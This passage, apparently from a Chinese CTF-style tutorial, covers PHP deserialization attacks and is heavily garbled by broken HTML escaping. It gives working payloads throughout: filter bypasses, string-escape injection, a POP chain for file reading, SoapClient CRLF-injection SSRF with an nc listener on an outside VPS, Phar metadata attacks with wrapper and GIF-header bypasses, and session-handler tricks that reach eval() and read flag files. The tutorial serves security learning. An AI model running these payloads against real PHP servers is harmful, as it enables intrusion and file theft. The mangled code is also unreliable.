    if($this-&gt;a===$this-&gt;b){
        echo 666;
    }
}
<\/code><\/pre>
}

\(a = serialize(new test());<\/pre><p><span style="color:#222222;background-color:#ffffff">上面这个例子将<\/span><code>\)<\/span>b设置为\(a<\/code><span style="color:#222222;background-color:#ffffff">的引用，可以使<\/span><code>\)<\/span>a永远与\(b<\/code><span style="color:#222222;background-color:#ffffff">相等<\/span><br\/><strong style="color:#000000;background-color:#ffffff">5. 16进制绕过字符的过滤<\/strong><\/p><pre data-language="php">O:4:"test":2:{s:4:"%00*%00a";s:3:"abc";s:7:"%00test%00b";s:3:"def";} 可以写成 O:4:"test":2:{S:4:"\00*\00\61";s:3:"abc";s:7:"%00test%00b";s:3:"def";} 表示字符类型的s大写时，会被当成16进制解析。<\/pre><p>示例代码：<\/p><pre data-language="php"><?php class test{ public \)<\/span>username;

public function __construct(){

\(this->username = 'admin'; } public function  __destruct(){ echo 666; } } function check(\)<\/span>data){

if(stristr(\(data, 'username')!==False){ echo("你绕不过！！".PHP_EOL); } else{ return \)<\/span>data;

}

}

\/\/ 未作处理前

\(a = 'O:4:"test":1:{s:8:"username";s:5:"admin";}';\)<\/span>a = check(\(a); unserialize(\)<\/span>a);

\/\/ 做处理后 \75是u的16进制

\(a = 'O:4:"test":1:{S:8:"\\75sername";s:5:"admin";}';\)<\/span>a = check(\(a); unserialize(\)<\/span>a);6. PHP反序列化字符逃逸情况1：过滤后字符变多首先给出本地的php代码，很简单不做过多的解释，就是把反序列化后的一个x替换成为两个<?php

function change(\(str){ return str_replace("x","xx",\)<\/span>str);

}

\(name = \)<\/span>_GET['name'];

\(age = "I am 11";\)<\/span>arr = array(\(name,\)<\/span>age);

echo "反序列化字符串：";

var_dump(serialize(\(arr)); echo "<br/>"; echo "过滤后:";\)<\/span>old = change(serialize(\(arr));\)<\/span>new = unserialize(\(old); var_dump(\)<\/span>new);

echo "<br\/>此时，age=\(new[1]";<\/pre><p><span style="color:#222222;background-color:#ffffff">正常情况,传入<\/span><code>name=mao<\/code><br\/><img class="ql-image" src="https:\/\/img-blog.csdnimg.cn\/20210203104830625.png#pic_center"\/><br\/><span style="color:#222222;background-color:#ffffff">如果此时多传入一个x的话会怎样，毫无疑问反序列化失败，由于溢出(s本来是4结果多了一个字符出来)，我们可以利用这一点实现字符串逃逸<\/span><br\/><img class="ql-image" src="https:\/\/img-blog.csdnimg.cn\/20210203104840221.png#pic_center"\/><br\/><span style="color:#222222;background-color:#ffffff">首先来看看结果，再来讲解<\/span><br\/><img class="ql-image" src="https:\/\/img-blog.csdnimg.cn\/20210203104847637.png#pic_center"\/><br\/><span style="color:#222222;background-color:#ffffff">我们传入<\/span><code>name=maoxxxxxxxxxxxxxxxxxxxx";i:1;s:6:"woaini";}<\/code><br\/><code>";i:1;s:6:"woaini";}<\/code><span style="color:#222222;background-color:#ffffff">这一部分一共二十个字符<\/span><br\/><span style="color:#222222;background-color:#ffffff">由于一个x会被替换为两个，我们输入了一共20个x，现在是40个，多出来的20个x其实取代了我们的这二十个字符<\/span><code>";i:1;s:6:"woaini";}<\/code><span style="color:#222222;background-color:#ffffff">，从而造成<\/span><code>";i:1;s:6:"woaini";}<\/code><span style="color:#222222;background-color:#ffffff">的溢出，而<\/span><code>"<\/code><span style="color:#222222;background-color:#ffffff">闭合了前串，使得我们的字符串成功逃逸，可以被反序列化，输出<\/span><code>woaini<\/code><br\/><span style="color:#222222;background-color:#ffffff">最后的<\/span><code>;}<\/code><span style="color:#222222;background-color:#ffffff">闭合反序列化全过程导致原来的<\/span><code>";i:1;s:7:"I am 11";}"<\/code><span style="color:#222222;background-color:#ffffff">被舍弃，不影响反序列化过程`<\/span><\/p><h4><strong style="color:#000000;background-color:#ffffff">情况2：过滤后字符变少<\/strong><\/h4><p><span style="color:#222222;background-color:#ffffff">老规矩先上代码,很简单不做过多的解释，就是把反序列化后的两个x替换成为一个<\/span><\/p><pre data-language="php"><?php function change(\)<\/span>str){

return str_replace("xx","x",\(str); }\)<\/span>arr['name'] = \(_GET['name'];\)<\/span>arr['age'] = \(_GET['age']; echo "反序列化字符串："; var_dump(serialize(\)<\/span>arr));

echo "<br\/>";

echo "过滤后:";

\(old = change(serialize(\)<\/span>arr));

var_dump(\(old); echo "<br/>";\)<\/span>new = unserialize(\(old); var_dump(\)<\/span>new);

echo "<br\/>此时，age=";

echo \(new['age'];<\/pre><p><span style="color:#222222;background-color:#ffffff">正常情况传入<\/span><code>name=mao&age=11<\/code><span style="color:#222222;background-color:#ffffff">的结果<\/span><br\/><img class="ql-image" src="https:\/\/img-blog.csdnimg.cn\/20210203104859195.png?x-oss-process=image\/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NvbGl0dWRp,size_16,color_FFFFFF,t_70#pic_center"\/><br\/><span style="color:#222222;background-color:#ffffff">老规矩看看最后构造的结果，再继续讲解<\/span><br\/><img class="ql-image" src="https:\/\/img-blog.csdnimg.cn\/20210203104905443.png?x-oss-process=image\/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NvbGl0dWRp,size_16,color_FFFFFF,t_70#pic_center"\/><br\/><span style="color:#222222;background-color:#ffffff">简单来说，就是前面少了一半，导致后面的字符被吃掉，从而执行了我们后面的代码；<\/span><br\/><span style="color:#222222;background-color:#ffffff">我们来看，这部分是age序列化后的结果<\/span><br\/><code>s:3:"age";s:28:"11";s:3:"age";s:6:"woaini";}"<\/code><br\/><span style="color:#222222;background-color:#ffffff">由于前面是40个x所以导致少了20个字符，所以需要后面来补上，<\/span><code>";s:3:"age";s:28:"11<\/code><span style="color:#222222;background-color:#ffffff">这一部分刚好20个，后面由于有<\/span><code>"<\/code><span style="color:#222222;background-color:#ffffff">闭合了前面因此后面的参数就可以由我们自定义执行了<\/span><\/p><h2><strong style="color:#000000;background-color:#ffffff">7. 对象注入<\/strong><\/h2><p><span style="color:#222222;background-color:#ffffff">当用户的请求在传给反序列化函数<\/span><code>unserialize()<\/code><span style="color:#222222;background-color:#ffffff">之前没有被正确的过滤时就会产生漏洞。因为PHP允许对象序列化，攻击者就可以提交特定的序列化的字符串给一个具有该漏洞的<\/span><code>unserialize<\/code><span style="color:#222222;background-color:#ffffff">函数，最终导致一个在该应用范围内的任意PHP对象注入。<\/span><br\/><strong style="color:#222222;background-color:#ffffff">对象漏洞<\/strong><span style="color:#222222;background-color:#ffffff">出现得满足两个前提<\/span><\/p><pre data-language="plain">1、unserialize的参数可控。 2、代码里有定义一个含有魔术方法的类，并且该方法里出现一些使用类成员变量作为参数的存在安全问题的函数。<\/pre><p><span style="color:#222222;background-color:#ffffff">比如这个例子<\/span><\/p><pre data-language="php"><?php class A{ var \)<\/span>test = "y4mao";

function __destruct(){

echo \(this->test; } }\)<\/span>a = 'O:1:"A":1:{s:4:"test";s:5:"maomi";}';

unserialize($a);8. POP链的构造利用POP链简单介绍前面所讲解的序列化攻击更多的是魔术方法中出现一些利用的漏洞，因为自动调用而触发漏洞，但如果关键代码不在魔术方法中，而是在一个类的普通方法中。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来简单案例讲解首先看看简单的MRCTF2020-Ezpop,不带大家一一读代码了，自己解决<?php<\/p>
class Modifier {

protected  \(var; public function append(\)<\/span>value){

include(\(value); } public function __invoke(){\)<\/span>this->append($this->var);

}

}<\/p>
class Show{

public \(source; public \)<\/span>str;

public function __construct(\(file='index.php'){\)<\/span>this->source = \(file; echo 'Welcome to '.\)<\/span>this->source."<br>";

}

public function __toString(){

return $this->str->source;

}<\/p>
public function __wakeup(){
    if(preg_match(&quot;&#x2F;gopher|http|file|ftp|https|dict|\.\.&#x2F;i&quot;, $this-&gt;source)) {
        echo &quot;hacker&quot;;
        $this-&gt;source = &quot;index.php&quot;;
    }
}
<\/code><\/pre>
}<\/p>
class Test{

public \(p; public function __construct(){\)<\/span>this->p = array();

}<\/p>
public function __get($key){
    $function = $this-&gt;p;
    return $function();
}
<\/code><\/pre>
}这里我直接说利用思路，首先逆向分析，我们最终是希望通过Modifier当中的append方法实现本地文件包含读取文件，回溯到调用它的__invoke，当我们将对象调用为函数时触发,发现在Test类当中的__get方法，再回溯到Show当中的__toString，再回溯到Show当中的__wakeup当中有preg_match可以触发__toString<?php

ini_set('memory_limit','-1');

class Modifier {

protected  $var = 'php:\/\/filter\/read=convert.base64-encode\/resource=flag.php';

}<\/p>
class Show{

public \(source; public \)<\/span>str;

public function __construct(\(file){\)<\/span>this->source = \(file;\)<\/span>this->str = new Test();

}

}<\/p>
class Test{

public \(p; public function __construct(){\)<\/span>this->p = new Modifier();

}

}

\(a = new Show('aaa');\)<\/span>a = new Show(\(a); echo urlencode(serialize(\)<\/span>a));9. PHP原生类反序列化利用SoapClient介绍综述：

php在安装php-soap拓展后，可以反序列化原生类SoapClient，来发送http post请求。

必须调用SoapClient不存在的方法，触发SoapClient的__call魔术方法。

通过CRLF来添加请求体：SoapClient可以指定请求的user-agent头，通过添加换行符的形式来加入其他请求内容SoapClient采用了HTTP作为底层通讯协议，XML作为数据传送的格式，其采用了SOAP协议(SOAP 是一种简单的基于 XML 的协议,它使应用程序通过 HTTP 来交换信息)，其次我们知道某个实例化的类，如果去调用了一个不存在的函数，会去调用__call方法，具体详细的信息大家可以去搜索引擎看看，这里不再赘述利用方式下面首先在我的VPS上面开启监听nc -lvvp 9328<?php

\(a = new SoapClient(null,array('uri'=>'bbb', 'location'=>'http://xxxx.xxx.xx:9328'));\)<\/span>b = serialize(\(a);\)<\/span>c = unserialize(\(b);\)<\/span>c -> not_a_function();\/\/调用不存在的方法，让SoapClient调用__call运行上面的php程序，在我的vps上面将会捕获监听：从上面这张图可以看到，SOAPAction处是我们的可控参数，因此我们可以尝试注入我们自己恶意构造的CRLF即插入**\r\n**，利用成功！但是还有个问题我们再发送POST数据的时候是需要遵循HTTP协议，指定请求头Content-Type: application\/x-www-form-urlencoded但Content-Type在SOAPAction的上面，就无法控制Content-Type,也就不能控制POST的数据接下来我们实验一下实战反序列化我们传入的vip执行getFlag函数(迷惑人的函数)<?php

highlight_file(FILE<\/strong>);

\(vip = unserialize(\)<\/span>_GET['vip']);

\(vip->getFlag(); //flag.php\)<\/span>xff = explode(',', \(_SERVER['HTTP_X_FORWARDED_FOR']); array_pop(\)<\/span>xff);

\(ip = array_pop(\)<\/span>xff);





if(\(ip!=='127.0.0.1'){ die('error'); }else{\)<\/span>token = \(_POST['token']; if(\)<\/span>token=='ctfshow'){

file_put_contents('flag.txt',\(flag); } }<\/pre><p><span style="color:#222222;background-color:#ffffff">由于服务器带有cloudfare代理，我们无法通过本地构造XFF头实现绕过，我们需要使用SoapClient与CRLF实现SSRF访问<\/span><code>127.0.0.1/flag.php<\/code><span style="color:#222222;background-color:#ffffff">,即可绕过cloudfare代理<\/span><\/p><pre data-language="php"><?php\)<\/span>target = 'http:\/\/127.0.0.1\/flag.php';

\(post_string = 'token=ctfshow';\)<\/span>headers = array(

'X-Forwarded-For: 127.0.0.1,127.0.0.1',

'UM_distinctid:175648cc09a7ae-050bc162c95347-32667006-13c680-175648cc09b69d'

);

\(b = new SoapClient(null,array('location' => \)<\/span>target,'user_agent'=>'y4tacker^^Content-Type: application\/x-www-form-urlencoded^^'.join('^^',\(headers).'^^Content-Length: '.(string)strlen(\)<\/span>post_string).'^^^^'.\(post_string,'uri' => "aaab"));\)<\/span>aaa = serialize(\(b);\)<\/span>aaa = str_replace('^^',"\r\n",\(aaa);\)<\/span>aaa = str_replace('&','&',\(aaa); echo urlencode(\)<\/span>aaa);接下来访问flag.txt即可10. Phar反序列化phar文件本质上是一种压缩文件，会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时，会自动反序列化meta-data内的内容。什么是phar文件在软件中，PHAR（PHP归档）文件是一种打包格式，通过将许多PHP代码文件和其他资源（例如图像，样式表等）捆绑到一个归档文件中来实现应用程序和库的分发php通过用户定义和内置的“流包装器”实现复杂的文件处理功能。内置包装器可用于文件系统函数，如(fopen(),copy(),file_exists()和filesize()。 phar:\/\/就是一种内置的流包装器。php中一些常见的流包装器如下：file:\/\/ — 访问本地文件系统，在用文件系统函数时默认就使用该包装器

http:\/\/ — 访问 HTTP(s) 网址

ftp:\/\/ — 访问 FTP(s) URLs

php:\/\/ — 访问各个输入\/输出流（I\/O streams）

zlib:\/\/ — 压缩流

data:\/\/ — 数据（RFC 2397）

glob:\/\/ — 查找匹配的文件路径模式

phar:\/\/ — PHP 归档

ssh2:\/\/ — Secure Shell 2

rar:\/\/ — RAR

ogg:\/\/ — 音频流

expect:\/\/ — 处理交互式的流phar文件的结构stub:phar文件的标志，必须以 xxx __HALT_COMPILER();?> 结尾，否则无法识别。xxx可以为自定义内容。manifest:phar文件本质上是一种压缩文件，其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data，这是漏洞利用最核心的地方。content:被压缩文件的内容signature (可空):签名，放在末尾。如何生成一个phar文件？下面给出一个参考例子<?php

class Test {

}<\/p>
@unlink(&quot;phar.phar&quot;);
$phar = new Phar(&quot;phar.phar&quot;); &#x2F;&#x2F;后缀名必须为phar
$phar-&gt;startBuffering();
$phar-&gt;setStub(&quot;&lt;?php __HALT_COMPILER(); ?&gt;&quot;); &#x2F;&#x2F;设置stub
$o = new Test();
$phar-&gt;setMetadata($o); &#x2F;&#x2F;将自定义的meta-data存入manifest
$phar-&gt;addFromString(&quot;test.txt&quot;, &quot;test&quot;); &#x2F;&#x2F;添加要压缩的文件
&#x2F;&#x2F;签名自动计算
$phar-&gt;stopBuffering();
<\/code><\/pre>
?>漏洞利用条件phar文件要能够上传到服务器端。要有可用的魔术方法作为“跳板”。文件操作函数的参数可控，且:、\/、phar等特殊字符没有被过滤。受影响的函数知道创宇测试后受影响的函数列表：实际上不止这些，也可以参考这篇链接，里面有详细说明https:\/\/blog.zsxsoft.com\/post\/38当然为了阅读方便，这里便把它整理过来\/\/exif

exif_thumbnail

exif_imagetype<\/p>
\/\/gd

imageloadfont

imagecreatefrom***系列函数<\/p>
\/\/hash<\/p>
hash_hmac_file

hash_file

hash_update_file

md5_file

sha1_file<\/p>
\/\/ file\/url

get_meta_tags

get_headers<\/p>
\/\/standard

getimagesize

getimagesizefromstring<\/p>
\/\/ zip

\(zip = new ZipArchive();\)<\/span>res = \(zip->open('c.zip');\)<\/span>zip->extractTo('phar:\/\/test.phar\/test');

\/\/ Bzip \/ Gzip 当环境限制了phar不能出现在前面的字符里。可以使用compress.bzip2:\/\/和compress.zlib:\/\/绕过

\(z = 'compress.bzip2://phar:///home/sx/test.phar/test.txt';\)<\/span>z = 'compress.zlib:\/\/phar:\/\/\/home\/sx\/test.phar\/test.txt';<\/p>
\/\/配合其他协议：(SUCTF)

\/\/https:\/\/www.xctf.org.cn\/library\/details\/17e9b70557d94b168c3e5d1e7d4ce78f475de26d\/

\/\/当环境限制了phar不能出现在前面的字符里，还可以配合其他协议进行利用。

\/\/php:\/\/filter\/read=convert.base64-encode\/resource=phar:\/\/phar.phar<\/p>
\/\/Postgres pgsqlCopyToFile和pg_trace同样也是能使用的，需要开启phar的写功能。

<?php

\(pdo = new PDO(sprintf("pgsql:host=%s;dbname=%s;user=%s;password=%s", "127.0.0.1", "postgres", "sx", "123456")); @\)<\/span>pdo->pgsqlCopyFromFile('aa', 'phar:\/\/phar.phar\/aa');

?><\/p>
\/\/ Mysql

\/\/LOAD DATA LOCAL INFILE也会触发这个php_stream_open_wrapper

\/\/配置一下mysqld:

\/\/[mysqld]

\/\/local-infile=1

\/\/secure_file_priv=""<\/p>
<?php

class A {

public \(s = ''; public function __wakeup () { system(\)<\/span>this->s);

}

}

\(m = mysqli_init(); mysqli_options(\)<\/span>m, MYSQLI_OPT_LOCAL_INFILE, true);

\(s = mysqli_real_connect(\)<\/span>m, 'localhost', 'root', 'root', 'testtable', 3306);

\(p = mysqli_query(\)<\/span>m, 'LOAD DATA LOCAL INFILE &#x27;phar:\/\/test.phar\/test&#x27; INTO TABLE a  LINES TERMINATED BY &#x27;\r\n&#x27;  IGNORE 1 LINES;');

?>绕过方式当环境限制了phar不能出现在前面的字符里。可以使用compress.bzip2:\/\/和compress.zlib:\/\/等绕过compress.bzip:\/\/phar:\/\/\/test.phar\/test.txt

compress.bzip2:\/\/phar:\/\/\/test.phar\/test.txt

compress.zlib:\/\/phar:\/\/\/home\/sx\/test.phar\/test.txt

php:\/\/filter\/resource=phar:\/\/\/test.phar\/test.txt当环境限制了phar不能出现在前面的字符里，还可以配合其他协议进行利用。php:\/\/filter\/read=convert.base64-encode\/resource=phar:\/\/phar.pharGIF格式验证可以通过在文件头部添加GIF89a绕过1、\(phar->setStub(“GIF89a”.“<?php __HALT_COMPILER(); ?>”);<\/code><span style="color:#222222;background-color:#ffffff"> //设置stub<\/span><br\/><span style="color:#222222;background-color:#ffffff">2、生成一个phar.phar，修改后缀名为phar.gif<\/span><\/p><h2><strong style="color:#000000;background-color:#ffffff">11. php-session反序列化<\/strong><\/h2><h3><strong style="color:#000000;background-color:#ffffff">session简单介绍<\/strong><\/h3><p><span style="color:#222222;background-color:#ffffff">在计算机中，尤其是在网络应用中，称为“会话控制”。Session 对象存储特定用户会话所需的属性及配置信息。这样，当用户在应用程序的 Web 页之间跳转时，存储在 Session 对象中的变量将不会丢失，而是在整个用户会话中一直存在下去。当用户请求来自应用程序的 Web 页时，如果该用户还没有会话，则 Web 服务器将自动创建一个 Session 对象。当会话过期或被放弃后，服务器将终止该会话。<\/span><br\/><span style="color:#222222;background-color:#ffffff">当第一次访问网站时，Seesion_start()函数就会创建一个唯一的Session ID，并自动通过HTTP的响应头，将这个Session ID保存到客户端Cookie中。同时，也在服务器端创建一个以Session ID命名的文件，用于保存这个用户的会话信息。当同一个用户再次访问这个网站时，也会自动通过HTTP的请求头将Cookie中保存的Seesion ID再携带过来，这时Session_start()函数就不会再去分配一个新的Session ID，而是在服务器的硬盘中去寻找和这个Session ID同名的Session文件，将这之前为这个用户保存的会话信息读出，在当前脚本中应用，达到跟踪这个用户的目的。<\/span><\/p><h3><strong style="color:#000000;background-color:#ffffff">session 的存储机制<\/strong><\/h3><p><span style="color:#222222;background-color:#ffffff">php中的session中的内容并不是放在内存中的，而是以文件的方式来存储的，存储方式就是由配置项session.save_handler来进行确定的，默认是以文件的方式存储。<\/span><br\/><span style="color:#222222;background-color:#ffffff">存储的文件是以sess_sessionid来进行命名的<\/span><\/p><table><tbody><tr><td data-row="1"><p class="ql-align-center"><strong style="color:#4f4f4f;background-color:#eff3f5">php_serialize 经过serialize()函数序列化数组<\/strong><\/p><\/td><\/tr><tr><td data-row="2"><p class="ql-align-center"><span style="color:#4f4f4f;background-color:#ffffff">php<\/span><\/p><\/td><td data-row="2"><p class="ql-align-center"><span style="color:#4f4f4f;background-color:#ffffff">键名+竖线+经过serialize()函数处理的值<\/span><\/p><\/td><\/tr><tr><td data-row="3"><p class="ql-align-center"><span style="color:#4f4f4f;background-color:#f7f7f7">php_binary<\/span><\/p><\/td><td data-row="3"><p class="ql-align-center"><span style="color:#4f4f4f;background-color:#f7f7f7">键名的长度对应的ascii字符+键名+serialize()函数序列化的值<\/span><\/p><\/td><\/tr><\/tbody><\/table><h3><strong style="color:#000000;background-color:#ffffff">php.ini中一些session配置<\/strong><\/h3><pre data-language="plain">session.save_path=“” --设置session的存储路径 session.save_handler=“”–设定用户自定义存储函数，如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式) session.auto_start boolen–指定会话模块是否在请求开始时启动一个会话默认为0不启动 session.serialize_handler string–定义用来序列化/反序列化的处理器名字。默认使用php<\/pre><h3><strong style="color:#000000;background-color:#ffffff">利用姿势<\/strong><\/h3><h4><strong style="color:#000000;background-color:#ffffff">session.upload_progress进行文件包含和反序列化渗透<\/strong><\/h4><p><span style="color:#222222;background-color:#ffffff">这篇文章说的很详细了，没必要班门弄斧<\/span><br\/><span style="color:#222222;background-color:#ffffff">https://www.freebuf.com/vuls/202819.html<\/span><\/p><h4><strong style="color:#000000;background-color:#ffffff">使用不同的引擎来处理session文件<\/strong><\/h4><h5><strong style="color:#000000;background-color:#ffffff">\)<\/span>_SESSION变量直接可控php引擎的存储格式是键名|serialized_string，而php_serialize引擎的存储格式是serialized_string。如果程序使用两个引擎来分别处理的话就会出现问题来看看这两个php\/\/ 1.php

<?php

ini_set('session.serialize_handler', 'php_serialize');

session_start();

\(_SESSION['y4'] = \)<\/span>_GET['a'];

var_dump(\(_SESSION); //2.php <?php ini_set('session.serialize_handler', 'php'); session_start(); class test{ public \)<\/span>name;

function __wakeup(){

echo \(this->name; } }<\/pre><p><span style="color:#222222;background-color:#ffffff">首先访问1.php，传入参数<\/span><code>a=|O:4:"test":1:{s:4:"name";s:8:"y4tacker";}<\/code><span style="color:#222222;background-color:#ffffff">再访问2.php，注意不要忘记<\/span><code>|<\/code><br\/><img class="ql-image" src="https:\/\/img-blog.csdnimg.cn\/20210203105022427.png?x-oss-process=image\/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NvbGl0dWRp,size_16,color_FFFFFF,t_70#pic_center"\/><br\/><span style="color:#222222;background-color:#ffffff">由于<\/span><code>1.php<\/code><span style="color:#222222;background-color:#ffffff">是使用<\/span><code>php_serialize<\/code><span style="color:#222222;background-color:#ffffff">引擎处理，因此只会把<\/span><code>'|'<\/code><span style="color:#222222;background-color:#ffffff">当做一个正常的字符。然后访问<\/span><code>2.php<\/code><span style="color:#222222;background-color:#ffffff">，由于用的是<\/span><code>php<\/code><span style="color:#222222;background-color:#ffffff">引擎，因此遇到<\/span><code>'|'<\/code><span style="color:#222222;background-color:#ffffff">时会将之看做键名与值的分割符，从而造成了歧义，导致其在解析session文件时直接对<\/span><code>'|'<\/code><span style="color:#222222;background-color:#ffffff">后的值进行反序列化处理。<\/span><br\/><span style="color:#222222;background-color:#ffffff">这里可能会有一个小疑问，为什么在解析session文件时直接对<\/span><code>'|'<\/code><span style="color:#222222;background-color:#ffffff">后的值进行反序列化处理，这也是处理器的功能？这个其实是因为<\/span><code>session_start()<\/code><span style="color:#222222;background-color:#ffffff">这个函数，可以看下官方说明：<\/span><\/p><blockquote>当会话自动开始或者通过 session_start() 手动开始的时候， PHP 内部会调用会话管理器的 open 和 read 回调函数。 会话管理器可能是 PHP 默认的， 也可能是扩展提供的（SQLite 或者 Memcached 扩展）， 也可能是通过 session_set_save_handler() 设定的用户自定义会话管理器。 通过 read 回调函数返回的现有会话数据（使用特殊的序列化格式存储），PHP 会自动反序列化数据并且填充 \)<\/span>_SESSION 超级全局变量因此我们成功触发了test类中的__wakeup()方法,所以这种攻击思路是可行的。但这种方法是在可以对session的进行赋值的，那如果代码中不存在对\(_SESSION<\/code><span style="color:#222222;background-color:#ffffff">变量赋值的情况下又该如何利用<\/span><\/p><h5><strong style="color:#000000;background-color:#ffffff">\)<\/span>_SESSION变量直接不可控我们来看高校战疫的一道CTF题目<?php

\/\/A webshell is wait for you

ini_set('session.serialize_handler', 'php');

session_start();

class OowoO

{

public \(mdzz; function __construct() {\)<\/span>this->mdzz = 'phpinfo();';

}<\/p>
function __destruct()
{
    eval($this-&gt;mdzz);
}
<\/code><\/pre>
}

if(isset(\(_GET['phpinfo'])) {\)<\/span>m = new OowoO();

}

else

{

highlight_string(file_get_contents('index.php'));

}

?>我们注意到这样一句话ini_set('session.serialize_handler', 'php');，因此不难猜测本身在php.ini当中的设置可能是php_serialize，在查看了phpinfo后得证猜测正确，也知道了这道题的考点那么我们就进入phpinfo查看一下，enabled=on表示upload_progress功能开始，也意味着当浏览器向服务器上传一个文件时，php将会把此次文件上传的详细信息(如上传时间、上传进度等)存储在session当中 ；只需往该地址任意 POST 一个名为 PHP_SESSION_UPLOAD_PROGRESS 的字段，就可以将filename的值赋值到session中构造文件上传的表单<form action="http:\/\/web.jarvisoj.com:32784\/index.php" method="POST" enctype="multipart\/form-data">

<input type="hidden" name="777" \/>

<input type="file" name="file" \/>

<input type="submit" \/>

<\/form>接下来构造序列化payload<?php

ini_set('session.serialize_handler', 'php_serialize');

session_start();

class OowoO

{

public \(mdzz='print_r(scandir(dirname(__FILE__)));'; }\)<\/span>obj = new OowoO();

echo serialize(\(obj); ?><\/pre><p><span style="color:#222222;background-color:#ffffff">由于采用Burp发包，为防止双引号被转义，在双引号前加上<\/span><code>\<\/code><span style="color:#222222;background-color:#ffffff">，除此之外还要加上<\/span><code>|<\/code><br\/><span style="color:#222222;background-color:#ffffff">在这个页面随便上传一个文件，然后抓包修改<\/span><code>filename<\/code><span style="color:#222222;background-color:#ffffff">的值<\/span><br\/><img class="ql-image" src="https:\/\/img-blog.csdnimg.cn\/20210203105041160.png?x-oss-process=image\/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NvbGl0dWRp,size_16,color_FFFFFF,t_70#pic_center"\/><br\/><span style="color:#222222;background-color:#ffffff">可以看到<\/span><code>Here_1s_7he_fl4g_buT_You_Cannot_see.php<\/code><span style="color:#222222;background-color:#ffffff">这个文件，flag肯定在里面，但还有一个问题就是不知道这个路径，路径的问题就需要回到phpinfo页面去查看<\/span><br\/><img class="ql-image" src="https:\/\/img-blog.csdnimg.cn\/20210203105048835.png#pic_center"\/><br\/><span style="color:#222222;background-color:#ffffff">因此我们只需要把payload，当中改为<\/span><code>print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));<\/code><span style="color:#222222;background-color:#ffffff">即可获取flag<\/span><\/p><pre data-language="php"><?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); class OowoO { public \)<\/span>mdzz='print_r(file_get_contents("\/opt\/lampp\/htdocs\/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));';

}

\(obj = new OowoO(); echo serialize(\)<\/span>obj);

?>参考：https:\/\/blog.csdn.net\/solitudi\/article\/details\/113588692<\/p>